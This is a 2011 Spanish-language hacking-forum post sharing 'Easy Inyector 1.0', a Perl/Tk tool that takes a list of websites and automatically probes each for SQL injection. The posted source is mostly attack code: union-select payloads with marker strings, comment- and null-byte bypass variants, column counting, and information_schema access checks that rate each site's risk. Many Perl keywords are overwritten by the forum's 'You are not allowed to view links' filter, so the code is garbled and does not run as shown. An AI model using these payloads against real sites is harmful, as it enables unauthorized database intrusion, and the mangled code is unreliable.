send
Grupo de Telegram
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

[Perl Tk] Easy Inyector 1.0

  • 0 Respuestas
  • 880 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado BigBear

  • *
  • Underc0der
  • Mensajes: 543
  • Actividad:
    0%
  • Reputación 3
    • Ver Perfil
« en: Julio 03, 2011, 10:00:25 pm »
Hola , aca les dejo un programa para escanear las vulnerabilidad SQL , solo
ponen un archivo de texto con las webs y el programa testea si la vulnerabilidad permite hacer varias
cosas o no.

Imagen





Código: Perl
  1. #!usr/bin/perl
  2. #Easy Inyector 1.0 (C) Doddy Hackman 2011
  3.  
  4. use Tk;
  5. use Tk::FileSelect;
  6. use Win32;
  7. use LWP::UserAgent;
  8.  
  9. if ($^O eq 'MSWin32') {
  10. use Win32::Console;
  11. Win32::Console::Free();
  12. }
  13.  
  14. my $nave = LWP::UserAgent->new;
  15. $nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
  16. $nave->timeout(5);
  17.  
  18. my $more = MainWindow->new();
  19. $more->title("Easy Inyector 1.0 (C) Doddy Hackman 2011");
  20. $more->geometry("480x280+50+50");
  21. $more->resizable(0,0);
  22.  
  23. $more->Label(-text=>"File : ",-font=>"Impact1")->place(-You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login=>10,-x=>30);
  24. my $filex = $more->Entry(-width=>35)->place(-You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login=>15,-x=>80);
  25. $more->Button(-text=>"Start",-width=>10,-command=>\&start)->place(-You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login=>12,-x=>300);
  26. $more->Button(-text=>"Browse",-width=>10,-command=>\&poner)->place(-x=>370,-You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login=>12);
  27.  
  28. $more->Label(-text=>"Webs")->place(-You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login=>70,-x=>150);
  29. my $vuls = $more->Listbox(-width=>40)->place(-You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login=>100,-x=>50 );
  30.  
  31. $more->Label(-text=>"Risk")->place(-You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login=>70,-x=>350);
  32. my $type = $more->Listbox(-width=>10)->place(-You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login=>100,-x=>340);
  33.  
  34. MainLoop;
  35.  
  36. sub poner {
  37. $more->update;
  38. $browse = $more->FileSelect(-directory => "/");
  39. my $file = $browse->Show;
  40. $filex->configure(-text =>$file);
  41. }
  42.  
  43. sub start {
  44.  
  45. my $fileax = $filex->get;
  46.  
  47. unless (-f $fileax) {
  48. Win32::MsgBox("File dont exist",0,"Easy Inyector 1.0");
  49. } else {
  50.  
  51. $vuls->You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login("0.0","end");
  52. $type->You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login("0.0","end");
  53.  
  54. You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login(FIL,$fileax);
  55. my @webs = <FIL>;
  56. You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login FIL;
  57.  
  58. You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login @webs;
  59.  
  60. my @pages = repes(cortar(@webs));
  61.  
  62. for my $page(@pages) {
  63.  
  64. my ($gen,$save,$control) = &You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login($page,"--");
  65. if ($control eq 1) {
  66. $vuls->insert("end",$gen);
  67. details($gen,$bypass,$save);
  68. }
  69. }
  70. $more->update;
  71. Win32::MsgBox("[+] Scan Finished",0,"Easy Inyector 1.0");
  72. You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login("start logs/sqli-logs.txt");
  73. }}
  74.  
  75. sub You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login {
  76. my $rows  = "0";
  77. my $asc;
  78. my $page = $_[0];
  79.  
  80. ($pass1,$pass2) = &bypass($_[1]);
  81.  
  82. $inyection = $page."1".$pass1."and".$pass1."1=0".$pass1."order".$pass1."by"."9999999999".$pass2;
  83. $code = toma($inyection);
  84. $more->update;
  85.  
  86. if ($code=~ /supplied argument is not a valid MySQL result resource in <b>(.*)<\/b> on line /ig || $code=~ /mysql_free_result/ig || $code =~ /mysql_fetch_assoc/ig ||$code =~ /mysql_num_rows/ig || $code =~ /mysql_fetch_array/ig || $code =~/mysql_fetch_assoc/ig || $code=~/mysql_query/ig || $code=~/mysql_free_result/ig || $code=~/equivocado en su sintax/ig || $code=~/You have an error in your SQL syntax/ig || $code=~/Call to undefined function/ig) {
  87.  
  88. $more->update;
  89.  
  90. my $testar1 = toma($page."1".$pass1."and".$pass1."1=0".$pass2);
  91. my $testar2 = toma($page."1".$pass1."and".$pass1."1=1".$pass2);
  92.  
  93. unless ($testar1 eq $testar2) {
  94. my $patha = $1;
  95. You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login $patha;
  96. $alert = "char(".ascii("RATSXPDOWN1RATSXPDOWN").")";
  97. $total = "1";
  98. for my $rows(2..200) {
  99. $more->update;
  100. $asc.= ","."char(".ascii("RATSXPDOWN".$rows."RATSXPDOWN").")";
  101. $total.= ",".$rows;
  102. $injection = $page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$alert.$asc;
  103. $test = toma($injection);
  104. if ($test=~/RATSXPDOWN/) {
  105. @number = $test =~You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login{RATSXPDOWN(\d+)RATSXPDOWN}g;
  106. $control = 1;
  107. $total=~You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login/$number[0]/hackman/;
  108. You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login($page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$total,$save,$control);
  109. }}}}}
  110.  
  111. sub details {
  112. my ($page,$bypass,$save) = @_;
  113. ($pass1,$pass2) = &bypass($bypass);
  114. if ($page=~/(.*)hackman(.*)/ig) {
  115. my  ($start,$end) = ($1,$2);
  116. $inforschema = $start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."information_schema.tables".$pass2;
  117. $testx = toma($inforschema);
  118.  
  119. if ($testx=~/ERTOR854/ig) {
  120. $type->insert("end","Hight");
  121. savefile("sqli-logs.txt","[SQLI] : $page");
  122. savefile("sqli-logs.txt","[Risk] : Hight\n");
  123. } else {
  124. savefile("sqli-logs.txt","[SQLI] : $page");
  125. savefile("sqli-logs.txt","[Risk] : Low\n");
  126. $type->insert("end","Low");
  127. }}}
  128.  
  129. sub toma {
  130. You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login $nave->get($_[0])->content;
  131. }
  132.  
  133. sub savefile {
  134. You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login (SAVE,">>logs/".$_[0]);
  135. You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login SAVE $_[1]."\n";
  136. You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login SAVE;
  137. }
  138.  
  139. sub bypass {
  140. if ($_[0] eq "/*") { You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login ("/**/","/*"); }
  141. elsif ($_[0] eq "%20") { You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login ("%20","%00"); }
  142. else {You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login ("+","--");}}
  143.  
  144. sub ascii {
  145. You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login ',',You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login "U*",$_[0];
  146. }
  147.  
  148. sub ascii_de {
  149. $_[0] = You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login[], You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login { You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login } You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login[,],$_[0];
  150. You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login $_[0];
  151. }
  152.  
  153. sub cortar {
  154. my @nuevo;
  155. for(@_) {
  156. @tengo = You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login("=",$_);
  157. You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login(@nuevo,@tengo[0]."=");
  158. }
  159. You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login @nuevo;
  160. }
  161.  
  162. sub repes {
  163. foreach $test(@_) {
  164. You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login @limpio,$test unless $repe{$test}++;
  165. }
  166. You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login @limpio;
  167. }
  168.  
  169. # ¿ The End ?
  170.  
« Última modificación: Julio 17, 2011, 03:44:20 am por Sthefano02 »

 

¿Te gustó el post? COMPARTILO!



Tutorial perl desde cero By: Black Poision & Painboy

Iniciado por ProcessKill

Respuestas: 2
Vistas: 2953
Último mensaje Septiembre 02, 2011, 09:43:36 pm
por blozzter
[Perl] Verificando si es root para correr un script

Iniciado por c1st

Respuestas: 1
Vistas: 1380
Último mensaje Octubre 07, 2012, 06:01:39 pm
por ANTRAX
[Uniscan] Scanner de vulnerabilidades WEB hecho en Perl

Iniciado por tar3kw0rm3d

Respuestas: 0
Vistas: 1521
Último mensaje Junio 02, 2013, 08:01:28 pm
por tar3kw0rm3d
[Perl] Counter Strike 1.6 Servers List

Iniciado por BigBear

Respuestas: 0
Vistas: 1074
Último mensaje Noviembre 12, 2012, 07:32:11 pm
por BigBear
DoSing IP 1.0 - [Creado por SkillmaX] + Source [PERL]

Iniciado por SkillmaX

Respuestas: 0
Vistas: 1307
Último mensaje Julio 04, 2010, 10:14:31 am
por SkillmaX